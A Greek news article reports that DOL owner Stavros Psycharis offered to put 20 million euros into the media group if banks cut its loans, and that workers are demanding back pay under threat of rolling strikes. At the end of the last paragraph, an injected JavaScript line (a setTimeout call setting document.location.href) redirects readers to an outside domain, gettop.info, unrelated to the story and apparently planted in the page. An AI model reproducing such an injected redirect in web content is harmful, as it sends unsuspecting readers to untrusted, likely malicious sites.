Ψυχάρης: Θα βάλω 20 εκατ. στον ΔΟΛ αν «κουρευτούν» τα δάνεια

0
29

 

Δέσμευση του Σταύρου Ψυχάρη ότι θα χρηματοδοτήσει τον ΔΟΛ με 20 εκατ. ευρώ, στη βάση προγράμματος εξυγίανσής του, αν οι τράπεζες δεχτούν να «κουρέψουν» τα δάνειά του, μετέφερε στους εργαζόμενους ο διευθυντής του ΒΗΜΑτος Αντώνης Καρακούσης. Τα κεφάλαια αυτά θα χρησιμοποιηθούν -όπως είπε- για να εξοφληθούν τα δεδουλευμένα των εργαζομένων, καθώς και για να πληρωθούν οι αποζημιώσεις σε όσους δεχθούν να αποχωρήσουν οικειοθελώς.

Ο κ. Καρακούσης ανέφερε ότι μέσα στην επόμενη εβδομάδα θα δοθεί ένα 15νθήμερο στους εργαζόμενους, οι οποίοι ζήτησαν έναν ακόμη μισθό στις 15 Νοεμβρίου. Υπογράμμισαν δε ότι έως τις 9 Νοεμβρίου πρέπει να έχει δεσμευτεί η εργοδοσία πως θα γίνει η εκταμίευση στις 15 του μήνα. Διαφορετικά, από τις 10 Νοεμβρίου θα ξεκινήσουν 48ωρες κυλιόμενες απεργίες.

Είναι προφανές ότι ο ιδιοκτήτης του ΔΟΛ δεν βρήκε λύση στην αναζήτηση επενδυτή και γι αυτό δήλωσε ότι θα βάλει ο ίδιος τα χρήματα που απαιτούνται, αν συμφωνήσουν οι τράπεζες να «κουρέψουν» τα δάνεια του Οργανισμού.

Τα πράγματα πάντως είναι ρευστά, καθώς δεν είναι βέβαιο ότι θα συμφωνήσουν οι πιστώτριες τράπεζες σε σχέδιο εξυγίανσης με επικεφαλής τον κ. Ψυχάρη. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here